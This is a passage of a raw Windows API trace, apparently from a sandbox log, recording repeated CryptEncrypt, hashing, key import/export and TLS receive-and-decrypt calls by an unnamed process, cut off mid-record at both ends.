pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.271] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.271] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.271] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.271] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.272] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.272] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.272] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.272] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.272] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.272] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.272] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.272] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.272] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.272] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.272] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.272] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.272] malloc (_Size=0x1fd) returned 0x3691270 [0156.273] free (_Block=0x0) [0156.273] free (_Block=0x3d81e60) [0156.273] free (_Block=0x606108) [0156.273] malloc (_Size=0x1fd) returned 0x606108 [0156.273] free (_Block=0x0) [0156.273] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.273] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.273] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.273] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.273] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.273] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.273] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.273] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.273] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.274] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.274] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.274] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.274] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.274] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.274] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.274] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.274] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.274] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.274] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.274] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.274] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.274] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.274] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.275] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.275] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.275] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.275] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.275] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.275] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.275] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.275] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.275] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.275] malloc (_Size=0x1fd) returned 0x3d81e60 [0156.275] free (_Block=0x0) [0156.275] free (_Block=0x3691270) [0156.275] malloc (_Size=0x1fd) returned 0x3691270 [0156.275] free (_Block=0x0) [0156.275] CryptDuplicateHash (in: hHash=0x3e0bd8, pdwReserved=0x0, dwFlags=0x0, phHash=0x339fb34 | out: phHash=0x339fb34) returned 1 [0156.276] CryptHashData (hHash=0x3e1a18, pbData=0x3691270, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0156.276] malloc (_Size=0x14) returned 0x3f65340 [0156.276] free (_Block=0x0) [0156.276] CryptGetHashParam (in: hHash=0x3e1a18, dwParam=0x2, pbData=0x3f65340, pdwDataLen=0x339faec, dwFlags=0x0 | out: pbData=0x3f65340, pdwDataLen=0x339faec) returned 1 [0156.276] CryptHashData (hHash=0x3e0bd8, pbData=0x3691270, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0156.276] free (_Block=0x3f65340) [0156.276] CryptDestroyHash (hHash=0x3e1a18) returned 1 [0156.276] free (_Block=0x3691270) [0156.276] free (_Block=0x606108) [0156.276] malloc (_Size=0x1fd) returned 0x606108 [0156.276] free (_Block=0x0) [0156.276] free (_Block=0x0) [0156.276] free (_Block=0x0) [0156.276] SetEvent (hEvent=0x3a4) returned 1 [0156.276] free (_Block=0x0) [0156.277] free (_Block=0x606108) [0156.277] free (_Block=0x3d81e60) [0156.277] DecryptMessage (in: phContext=0x3594d4c, pMessage=0x339fb0c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x339fb0c, pfQOP=0x0) returned 0x80090318 [0156.277] recv (in: s=0x5c8, buf=0x3689268, len=16413, flags=0 | out: buf=0x3689268*) returned 543 [0156.445] DecryptMessage (in: phContext=0x3594d4c, pMessage=0x339fb0c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x339fb0c, pfQOP=0x0) returned 0x0 [0156.445] malloc (_Size=0x1fd) returned 0x606108 [0156.446] free (_Block=0x0) [0156.446] malloc (_Size=0x1fd) returned 0x3d81e60 [0156.446] free (_Block=0x0) [0156.446] free (_Block=0x0) [0156.446] free (_Block=0x606108) [0156.446] CryptImportKey (in: hProv=0x3e57b0, pbData=0x339f5d8, dwDataLen=0x190, hPubKey=0x0, dwFlags=0x1, phKey=0x339f5d4 | out: phKey=0x339f5d4*=0x3e1a18) returned 1 [0156.451] CryptExportKey (in: hKey=0x3e1a18, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x339f23c, pdwDataLen=0x339f224 | out: pbData=0x339f23c*, pdwDataLen=0x339f224*=0x90) returned 1 [0156.451] CryptExportKey (in: hKey=0x3e1a18, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x339f908, pdwDataLen=0x339f5cc | out: pbData=0x339f908*, pdwDataLen=0x339f5cc*=0x90) returned 1 [0156.451] malloc (_Size=0x80) returned 0x60a3e0 [0156.451] free (_Block=0x0) [0156.451] CryptDestroyKey (hKey=0x3e1a18) returned 1 [0156.451] malloc (_Size=0x64) returned 0x60b0e0 [0156.451] free (_Block=0x0) [0156.451] malloc (_Size=0x80) returned 0x60a248 [0156.452] free (_Block=0x0) [0156.452] malloc (_Size=0xc0) returned 0x3df0550 [0156.452] free (_Block=0x60a248) [0156.452] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x339fa5c | out: phHash=0x339fa5c) returned 1 [0156.452] CryptHashData (hHash=0x3e1618, pbData=0x3df0550, dwDataLen=0x81, dwFlags=0x0) returned 1 [0156.452] malloc (_Size=0x14) returned 0x3f65280 [0156.452] free (_Block=0x0) [0156.452] CryptGetHashParam (in: hHash=0x3e1618, dwParam=0x2, pbData=0x3f65280, pdwDataLen=0x339fa54, dwFlags=0x0 | out: pbData=0x3f65280, pdwDataLen=0x339fa54) returned 1 [0156.452] CryptDestroyHash (hHash=0x3e1618) returned 1 [0156.452] free (_Block=0x3f65280) [0156.452] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x339fa5c | out: phHash=0x339fa5c) returned 1 [0156.452] CryptHashData (hHash=0x3e1818, pbData=0x3df0550, dwDataLen=0x81, dwFlags=0x0) returned 1 [0156.452] malloc (_Size=0x14) returned 0x3f653c0 [0156.452] free (_Block=0x0) [0156.452] CryptGetHashParam (in: hHash=0x3e1818, dwParam=0x2, pbData=0x3f653c0, pdwDataLen=0x339fa54, dwFlags=0x0 | out: pbData=0x3f653c0, pdwDataLen=0x339fa54) returned 1 [0156.452] CryptDestroyHash (hHash=0x3e1818) returned 1 [0156.453] free (_Block=0x3f653c0) [0156.453] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x339fa5c | out: phHash=0x339fa5c) returned 1 [0156.453] CryptHashData (hHash=0x3e15d8, pbData=0x3df0550, dwDataLen=0x81, dwFlags=0x0) returned 1 [0156.453] malloc (_Size=0x14) returned 0x3f65280 [0156.453] free (_Block=0x0) [0156.453] CryptGetHashParam (in: hHash=0x3e15d8, dwParam=0x2, pbData=0x3f65280, pdwDataLen=0x339fa54, dwFlags=0x0 | out: pbData=0x3f65280, pdwDataLen=0x339fa54) returned 1 [0156.453] CryptDestroyHash (hHash=0x3e15d8) returned 1 [0156.453] free (_Block=0x3f65280) [0156.453] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x339fa5c | out: phHash=0x339fa5c) returned 1 [0156.453] CryptHashData (hHash=0x3e15d8, pbData=0x3df0550, dwDataLen=0x81, dwFlags=0x0) returned 1 [0156.453] malloc (_Size=0x14) returned 0x3f65360 [0156.453] free (_Block=0x0) [0156.453] CryptGetHashParam (in: hHash=0x3e15d8, dwParam=0x2, pbData=0x3f65360, pdwDataLen=0x339fa54, dwFlags=0x0 | out: pbData=0x3f65360, pdwDataLen=0x339fa54) returned 1 [0156.453] CryptDestroyHash (hHash=0x3e15d8) returned 1 [0156.453] free (_Block=0x3f65360) [0156.453] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x339fa5c | out: phHash=0x339fa5c) returned 1 [0156.453] CryptHashData (hHash=0x3e15d8, pbData=0x3df0550, dwDataLen=0x81, dwFlags=0x0) returned 1 [0156.453] malloc (_Size=0x14) returned 0x3f65340 [0156.453] free (_Block=0x0) [0156.453] CryptGetHashParam (in: hHash=0x3e15d8, dwParam=0x2, pbData=0x3f65340, pdwDataLen=0x339fa54, dwFlags=0x0 | out: pbData=0x3f65340, pdwDataLen=0x339fa54) returned 1 [0156.454] CryptDestroyHash (hHash=0x3e15d8) returned 1 [0156.454] free (_Block=0x3f65340) [0156.454] free (_Block=0x3df0550) [0156.454] malloc (_Size=0x50) returned 0x3d9ae00 [0156.454] free (_Block=0x0) [0156.454] free (_Block=0x60b0e0) [0156.454] free (_Block=0x60a3e0) [0156.454] malloc (_Size=0xb8) returned 0x3df0550 [0156.454] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x3df0600 | out: phHash=0x3df0600) returned 1 [0156.454] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x3df0604 | out: phHash=0x3df0604) returned 1 [0156.454] CryptHashData (hHash=0x3e15d8, pbData=0x339fa74, dwDataLen=0x14, dwFlags=0x0) returned 1 [0156.454] CryptHashData (hHash=0x3e1a18, pbData=0x339faf4, dwDataLen=0x14, dwFlags=0x0) returned 1 [0156.454] CryptImportKey (in: hProv=0x3cf450, pbData=0x339fa90, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x339fa8c | out: phKey=0x339fa8c*=0x3e1618) returned 1 [0156.454] CryptSetKeyParam (hKey=0x3e1618, dwParam=0x4, pbData=0x74199484*=0x2, dwFlags=0x0) returned 1 [0156.454] CryptImportKey (in: hProv=0x3cf450, pbData=0x339fa90, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x339fa8c | out: phKey=0x339fa8c*=0x3e1818) returned 1 [0156.454] CryptSetKeyParam (hKey=0x3e1818, dwParam=0x4, pbData=0x74199484*=0x2, dwFlags=0x0) returned 1 [0156.454] free (_Block=0x3d9ae00) [0156.454] malloc (_Size=0x10) returned 0x3648d10 [0156.455] free (_Block=0x0) [0156.455] SetEvent (hEvent=0x380) returned 1 [0156.455] free (_Block=0x3d81e60) [0156.455] DecryptMessage (in: phContext=0x3594d4c, pMessage=0x339fb0c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x339fb0c, pfQOP=0x0) returned 0x80090318 [0156.455] recv (in: s=0x5c8, buf=0x3689268, len=16413, flags=0 | out: buf=0x3689268*) returned 543 [0156.798] DecryptMessage (in: phContext=0x3594d4c, pMessage=0x339fb0c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x339fb0c, pfQOP=0x0) returned 0x0 [0156.798] malloc (_Size=0x1fd) returned 0x606108 [0156.798] free (_Block=0x0) [0156.798] malloc (_Size=0x1fd) returned 0x3d81e60 [0156.798] free (_Block=0x0) [0156.798] free (_Block=0x0) [0156.798] free (_Block=0x606108) [0156.798] malloc (_Size=0x1fd) returned 0x606108 [0156.798] free (_Block=0x0) [0156.799] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.799] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.799] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.799] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.799] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.799] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.799] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.799] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.799] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.799] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.799] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.799] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.800] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.800] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.800] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.800] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.800] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.800] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.800] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.800] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.800] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.800] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.800] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.800] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.800] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.801] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0156.801] CryptEncrypt (in: hKey=0x3e1818, 